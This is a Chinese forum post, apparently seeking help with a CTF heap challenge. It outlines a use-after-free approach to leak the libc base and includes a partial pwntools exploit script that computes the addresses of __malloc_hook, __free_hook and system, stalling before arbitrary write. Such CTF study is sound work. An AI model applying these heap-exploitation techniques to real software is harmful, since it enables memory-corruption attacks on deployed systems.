附件地址:https://t.wss.ink/f/a1932ijro2o
下面是自己写的部分exp
思路:
申请程序最大的内存,然后全部free掉
利用程序知道的super_666函数申请一块大内存
此时tcachebins会合并一部分成为smallbin
利用UAF泄露main_arena地址从而泄露libc
后面再进行任意写的时候就写不动了...
from pwn import *
io = process("./pwn")
libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
context.update( os = 'linux', arch = 'amd64',timeout = 1,log_level = 'debug')
context.terminal = ["deepin-terminal", "-x", "sh", "-c"]
def cmd(opt,idx):
io.sendlineafter(">>",str(opt).encode())
io.sendlineafter("Index?",str(idx).encode())
def super_666():
io.sendlineafter(">>",str(666).encode())
io.sendlineafter("hh!",str(1023).encode())
def add(idx,size):
cmd(1,idx)
io.sendlineafter("Size?",str(size).encode())
def delete(idx):
cmd(2,idx)
def show(idx):
cmd(4,idx)
def edit(idx,content):
cmd(3,idx)
io.sendlineafter("Content?",content)
for i in range(0x10):
add(i,0x60)
for j in range(0xf,-1,-1):
delete(j)
super_666()
gdb.attach(io)
pause()
show(0)
# -0x450 malloc_hook
__malloc_hook = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x450
libc.address = __malloc_hook - libc.sym['__malloc_hook']
system_addr = libc.sym['system']
__free_hook = libc.sym['__free_hook']
log.info("------>>>>",hex(__malloc_hook))
log.info("------>>>>",hex(__free_hook))
log.info("------>>>>",hex(system_addr))
pause()
log.info("k"*30)
io.interactive()
| 
发表于 2022-12-17 21:22
|
发表于 2022-12-18 09:08
